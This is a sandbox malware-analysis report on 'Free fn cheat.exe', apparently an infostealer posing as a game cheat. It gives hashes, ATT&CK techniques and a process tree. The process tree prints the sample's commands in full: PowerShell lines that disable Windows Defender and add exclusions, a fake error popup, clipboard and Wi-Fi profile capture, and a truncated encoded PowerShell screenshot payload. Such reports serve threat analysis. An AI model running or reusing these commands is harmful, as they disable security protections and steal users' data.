d7a14d28e816e746762905e28d50c3a1071761002487de02a424672fc97b66af

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 02:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Free fn cheat.exe
Size

7.5MB
MD5

4bef12cf7fe466637953e74344f8baad
SHA1

d492021ef4a9988ba076fd894703f54e19d7a210
SHA256

c719daf48013564b6692e2ee4ca7c05688b17945bd856c052e097e2e2a8e527c
SHA512

4e8280b6ea3d5cebd0a0892fd4654e8fc3ab4894aee952448ee21417f146cf4d5c578b9b97747d37e32ad8d9b82cb113f09ab6da0df190f1bd7504851eda1215
SSDEEP

196608:3hQCwV2urErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC18:GV2urEUWjqeWx06rYY8

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4424	powershell.exe
4340	powershell.exe
1548	powershell.exe
1080	powershell.exe
1328	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3016	cmd.exe
452	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4432	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe
4804	Free fn cheat.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3680	tasklist.exe
792	tasklist.exe
1768	tasklist.exe
2808	tasklist.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ccf-21.dat	upx
behavioral2/memory/4804-25-0x00007FF995F40000-0x00007FF996604000-memory.dmp	upx
behavioral2/files/0x0007000000023cc2-27.dat	upx
behavioral2/memory/4804-29-0x00007FF9A8E00000-0x00007FF9A8E25000-memory.dmp	upx
behavioral2/files/0x0007000000023cd3-39.dat	upx
behavioral2/files/0x0007000000023cc9-48.dat	upx
behavioral2/files/0x0007000000023cc8-47.dat	upx
behavioral2/files/0x0007000000023cc7-46.dat	upx
behavioral2/files/0x0007000000023cc6-45.dat	upx
behavioral2/files/0x0007000000023cc5-44.dat	upx
behavioral2/files/0x0007000000023cc4-43.dat	upx
behavioral2/files/0x0007000000023cc3-42.dat	upx
behavioral2/files/0x0007000000023cc1-41.dat	upx
behavioral2/files/0x0007000000023cd4-40.dat	upx
behavioral2/files/0x0007000000023cd2-38.dat	upx
behavioral2/files/0x0007000000023cce-35.dat	upx
behavioral2/files/0x0007000000023ccc-34.dat	upx
behavioral2/memory/4804-32-0x00007FF9ACB50000-0x00007FF9ACB5F000-memory.dmp	upx
behavioral2/files/0x0007000000023ccd-31.dat	upx
behavioral2/memory/4804-54-0x00007FF9A8BE0000-0x00007FF9A8C0D000-memory.dmp	upx
behavioral2/memory/4804-58-0x00007FF9A5B30000-0x00007FF9A5B54000-memory.dmp	upx
behavioral2/memory/4804-60-0x00007FF9A4210000-0x00007FF9A438F000-memory.dmp	upx
behavioral2/memory/4804-56-0x00007FF9A9950000-0x00007FF9A996A000-memory.dmp	upx
behavioral2/memory/4804-64-0x00007FF9A9A00000-0x00007FF9A9A0D000-memory.dmp	upx
behavioral2/memory/4804-66-0x00007FF9A5020000-0x00007FF9A5053000-memory.dmp	upx
behavioral2/memory/4804-71-0x00007FF9A4F50000-0x00007FF9A501D000-memory.dmp	upx
behavioral2/memory/4804-74-0x00007FF9A8E00000-0x00007FF9A8E25000-memory.dmp	upx
behavioral2/memory/4804-73-0x00007FF995850000-0x00007FF995D79000-memory.dmp	upx
behavioral2/memory/4804-70-0x00007FF995F40000-0x00007FF996604000-memory.dmp	upx
behavioral2/memory/4804-62-0x00007FF9A8CE0000-0x00007FF9A8CF9000-memory.dmp	upx
behavioral2/memory/4804-79-0x00007FF9A9260000-0x00007FF9A926D000-memory.dmp	upx
behavioral2/memory/4804-82-0x00007FF9A4A90000-0x00007FF9A4BAB000-memory.dmp	upx
behavioral2/memory/4804-81-0x00007FF9A9950000-0x00007FF9A996A000-memory.dmp	upx
behavioral2/memory/4804-78-0x00007FF9A8BE0000-0x00007FF9A8C0D000-memory.dmp	upx
behavioral2/memory/4804-76-0x00007FF9A8BC0000-0x00007FF9A8BD4000-memory.dmp	upx
behavioral2/memory/4804-103-0x00007FF9A5B30000-0x00007FF9A5B54000-memory.dmp	upx
behavioral2/memory/4804-122-0x00007FF9A4210000-0x00007FF9A438F000-memory.dmp	upx
behavioral2/memory/4804-124-0x00007FF9A8CE0000-0x00007FF9A8CF9000-memory.dmp	upx
behavioral2/memory/4804-232-0x00007FF9A5020000-0x00007FF9A5053000-memory.dmp	upx
behavioral2/memory/4804-234-0x00007FF9A4F50000-0x00007FF9A501D000-memory.dmp	upx
behavioral2/memory/4804-251-0x00007FF995850000-0x00007FF995D79000-memory.dmp	upx
behavioral2/memory/4804-264-0x00007FF9A8BC0000-0x00007FF9A8BD4000-memory.dmp	upx
behavioral2/memory/4804-281-0x00007FF9A4210000-0x00007FF9A438F000-memory.dmp	upx
behavioral2/memory/4804-289-0x00007FF9A4A90000-0x00007FF9A4BAB000-memory.dmp	upx
behavioral2/memory/4804-275-0x00007FF995F40000-0x00007FF996604000-memory.dmp	upx
behavioral2/memory/4804-276-0x00007FF9A8E00000-0x00007FF9A8E25000-memory.dmp	upx
behavioral2/memory/4804-291-0x00007FF9A8E00000-0x00007FF9A8E25000-memory.dmp	upx
behavioral2/memory/4804-304-0x00007FF9A4A90000-0x00007FF9A4BAB000-memory.dmp	upx
behavioral2/memory/4804-305-0x00007FF995850000-0x00007FF995D79000-memory.dmp	upx
behavioral2/memory/4804-303-0x00007FF9A9260000-0x00007FF9A926D000-memory.dmp	upx
behavioral2/memory/4804-302-0x00007FF9A8BC0000-0x00007FF9A8BD4000-memory.dmp	upx
behavioral2/memory/4804-300-0x00007FF9A4F50000-0x00007FF9A501D000-memory.dmp	upx
behavioral2/memory/4804-299-0x00007FF9A5020000-0x00007FF9A5053000-memory.dmp	upx
behavioral2/memory/4804-298-0x00007FF9A9A00000-0x00007FF9A9A0D000-memory.dmp	upx
behavioral2/memory/4804-297-0x00007FF9A8CE0000-0x00007FF9A8CF9000-memory.dmp	upx
behavioral2/memory/4804-296-0x00007FF9A4210000-0x00007FF9A438F000-memory.dmp	upx
behavioral2/memory/4804-295-0x00007FF9A5B30000-0x00007FF9A5B54000-memory.dmp	upx
behavioral2/memory/4804-294-0x00007FF9A9950000-0x00007FF9A996A000-memory.dmp	upx
behavioral2/memory/4804-293-0x00007FF9A8BE0000-0x00007FF9A8C0D000-memory.dmp	upx
behavioral2/memory/4804-292-0x00007FF9ACB50000-0x00007FF9ACB5F000-memory.dmp	upx
behavioral2/memory/4804-290-0x00007FF995F40000-0x00007FF996604000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3644	cmd.exe
2432	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1532	WMIC.exe
4168	WMIC.exe
4672	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
652	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4424	powershell.exe
1548	powershell.exe
1548	powershell.exe
4424	powershell.exe
4340	powershell.exe
4340	powershell.exe
452	powershell.exe
452	powershell.exe
452	powershell.exe
4852	powershell.exe
4852	powershell.exe
4852	powershell.exe
1080	powershell.exe
1080	powershell.exe
1356	powershell.exe
1356	powershell.exe
1328	powershell.exe
1328	powershell.exe
3936	powershell.exe
3936	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3680	tasklist.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeIncreaseQuotaPrivilege	2264	WMIC.exe
Token: SeSecurityPrivilege	2264	WMIC.exe
Token: SeTakeOwnershipPrivilege	2264	WMIC.exe
Token: SeLoadDriverPrivilege	2264	WMIC.exe
Token: SeSystemProfilePrivilege	2264	WMIC.exe
Token: SeSystemtimePrivilege	2264	WMIC.exe
Token: SeProfSingleProcessPrivilege	2264	WMIC.exe
Token: SeIncBasePriorityPrivilege	2264	WMIC.exe
Token: SeCreatePagefilePrivilege	2264	WMIC.exe
Token: SeBackupPrivilege	2264	WMIC.exe
Token: SeRestorePrivilege	2264	WMIC.exe
Token: SeShutdownPrivilege	2264	WMIC.exe
Token: SeDebugPrivilege	2264	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2264	WMIC.exe
Token: SeRemoteShutdownPrivilege	2264	WMIC.exe
Token: SeUndockPrivilege	2264	WMIC.exe
Token: SeManageVolumePrivilege	2264	WMIC.exe
Token: 33	2264	WMIC.exe
Token: 34	2264	WMIC.exe
Token: 35	2264	WMIC.exe
Token: 36	2264	WMIC.exe
Token: SeDebugPrivilege	4424	powershell.exe
Token: SeIncreaseQuotaPrivilege	2264	WMIC.exe
Token: SeSecurityPrivilege	2264	WMIC.exe
Token: SeTakeOwnershipPrivilege	2264	WMIC.exe
Token: SeLoadDriverPrivilege	2264	WMIC.exe
Token: SeSystemProfilePrivilege	2264	WMIC.exe
Token: SeSystemtimePrivilege	2264	WMIC.exe
Token: SeProfSingleProcessPrivilege	2264	WMIC.exe
Token: SeIncBasePriorityPrivilege	2264	WMIC.exe
Token: SeCreatePagefilePrivilege	2264	WMIC.exe
Token: SeBackupPrivilege	2264	WMIC.exe
Token: SeRestorePrivilege	2264	WMIC.exe
Token: SeShutdownPrivilege	2264	WMIC.exe
Token: SeDebugPrivilege	2264	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2264	WMIC.exe
Token: SeRemoteShutdownPrivilege	2264	WMIC.exe
Token: SeUndockPrivilege	2264	WMIC.exe
Token: SeManageVolumePrivilege	2264	WMIC.exe
Token: 33	2264	WMIC.exe
Token: 34	2264	WMIC.exe
Token: 35	2264	WMIC.exe
Token: 36	2264	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1532	WMIC.exe
Token: SeSecurityPrivilege	1532	WMIC.exe
Token: SeTakeOwnershipPrivilege	1532	WMIC.exe
Token: SeLoadDriverPrivilege	1532	WMIC.exe
Token: SeSystemProfilePrivilege	1532	WMIC.exe
Token: SeSystemtimePrivilege	1532	WMIC.exe
Token: SeProfSingleProcessPrivilege	1532	WMIC.exe
Token: SeIncBasePriorityPrivilege	1532	WMIC.exe
Token: SeCreatePagefilePrivilege	1532	WMIC.exe
Token: SeBackupPrivilege	1532	WMIC.exe
Token: SeRestorePrivilege	1532	WMIC.exe
Token: SeShutdownPrivilege	1532	WMIC.exe
Token: SeDebugPrivilege	1532	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1532	WMIC.exe
Token: SeRemoteShutdownPrivilege	1532	WMIC.exe
Token: SeUndockPrivilege	1532	WMIC.exe
Token: SeManageVolumePrivilege	1532	WMIC.exe
Token: 33	1532	WMIC.exe
Token: 34	1532	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2680 wrote to memory of 4804	2680	Free fn cheat.exe	83
PID 2680 wrote to memory of 4804	2680	Free fn cheat.exe	83
PID 4804 wrote to memory of 4808	4804	Free fn cheat.exe	84
PID 4804 wrote to memory of 4808	4804	Free fn cheat.exe	84
PID 4804 wrote to memory of 3952	4804	Free fn cheat.exe	85
PID 4804 wrote to memory of 3952	4804	Free fn cheat.exe	85
PID 4804 wrote to memory of 1572	4804	Free fn cheat.exe	86
PID 4804 wrote to memory of 1572	4804	Free fn cheat.exe	86
PID 4804 wrote to memory of 1224	4804	Free fn cheat.exe	89
PID 4804 wrote to memory of 1224	4804	Free fn cheat.exe	89
PID 4804 wrote to memory of 400	4804	Free fn cheat.exe	92
PID 4804 wrote to memory of 400	4804	Free fn cheat.exe	92
PID 4808 wrote to memory of 4424	4808	cmd.exe	95
PID 4808 wrote to memory of 4424	4808	cmd.exe	95
PID 3952 wrote to memory of 1548	3952	cmd.exe	94
PID 3952 wrote to memory of 1548	3952	cmd.exe	94
PID 1224 wrote to memory of 3680	1224	cmd.exe	97
PID 1224 wrote to memory of 3680	1224	cmd.exe	97
PID 1572 wrote to memory of 4292	1572	cmd.exe	96
PID 1572 wrote to memory of 4292	1572	cmd.exe	96
PID 400 wrote to memory of 2264	400	cmd.exe	98
PID 400 wrote to memory of 2264	400	cmd.exe	98
PID 4804 wrote to memory of 4884	4804	Free fn cheat.exe	100
PID 4804 wrote to memory of 4884	4804	Free fn cheat.exe	100
PID 4884 wrote to memory of 116	4884	cmd.exe	102
PID 4884 wrote to memory of 116	4884	cmd.exe	102
PID 4804 wrote to memory of 3384	4804	Free fn cheat.exe	103
PID 4804 wrote to memory of 3384	4804	Free fn cheat.exe	103
PID 3384 wrote to memory of 5112	3384	cmd.exe	105
PID 3384 wrote to memory of 5112	3384	cmd.exe	105
PID 4804 wrote to memory of 4644	4804	Free fn cheat.exe	106
PID 4804 wrote to memory of 4644	4804	Free fn cheat.exe	106
PID 4644 wrote to memory of 1532	4644	cmd.exe	108
PID 4644 wrote to memory of 1532	4644	cmd.exe	108
PID 4804 wrote to memory of 4556	4804	Free fn cheat.exe	109
PID 4804 wrote to memory of 4556	4804	Free fn cheat.exe	109
PID 4556 wrote to memory of 4168	4556	cmd.exe	111
PID 4556 wrote to memory of 4168	4556	cmd.exe	111
PID 4804 wrote to memory of 4428	4804	Free fn cheat.exe	162
PID 4804 wrote to memory of 4428	4804	Free fn cheat.exe	162
PID 4428 wrote to memory of 4340	4428	cmd.exe	114
PID 4428 wrote to memory of 4340	4428	cmd.exe	114
PID 4804 wrote to memory of 1556	4804	Free fn cheat.exe	115
PID 4804 wrote to memory of 1556	4804	Free fn cheat.exe	115
PID 4804 wrote to memory of 1868	4804	Free fn cheat.exe	116
PID 4804 wrote to memory of 1868	4804	Free fn cheat.exe	116
PID 1868 wrote to memory of 792	1868	cmd.exe	119
PID 1868 wrote to memory of 792	1868	cmd.exe	119
PID 1556 wrote to memory of 1768	1556	cmd.exe	120
PID 1556 wrote to memory of 1768	1556	cmd.exe	120
PID 4804 wrote to memory of 2228	4804	Free fn cheat.exe	121
PID 4804 wrote to memory of 2228	4804	Free fn cheat.exe	121
PID 4804 wrote to memory of 3016	4804	Free fn cheat.exe	122
PID 4804 wrote to memory of 3016	4804	Free fn cheat.exe	122
PID 4804 wrote to memory of 3488	4804	Free fn cheat.exe	123
PID 4804 wrote to memory of 3488	4804	Free fn cheat.exe	123
PID 4804 wrote to memory of 904	4804	Free fn cheat.exe	126
PID 4804 wrote to memory of 904	4804	Free fn cheat.exe	126
PID 4804 wrote to memory of 3644	4804	Free fn cheat.exe	128
PID 4804 wrote to memory of 3644	4804	Free fn cheat.exe	128
PID 4804 wrote to memory of 3512	4804	Free fn cheat.exe	131
PID 4804 wrote to memory of 3512	4804	Free fn cheat.exe	131
PID 4804 wrote to memory of 4668	4804	Free fn cheat.exe	133
PID 4804 wrote to memory of 4668	4804	Free fn cheat.exe	133

C:\Users\Admin\AppData\Local\Temp\Free fn cheat.exe
"C:\Users\Admin\AppData\Local\Temp\Free fn cheat.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2680
- C:\Users\Admin\AppData\Local\Temp\Free fn cheat.exe
  "C:\Users\Admin\AppData\Local\Temp\Free fn cheat.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Free fn cheat.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Free fn cheat.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Try uninstalling and resinstalling', 0, 'Random problem', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1572
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Try uninstalling and resinstalling', 0, 'Random problem', 0+16);close()"
      4⤵
      PID:4292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1224
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3384
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1556
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1868
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2228
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3488
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:904
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3644
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3512
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAA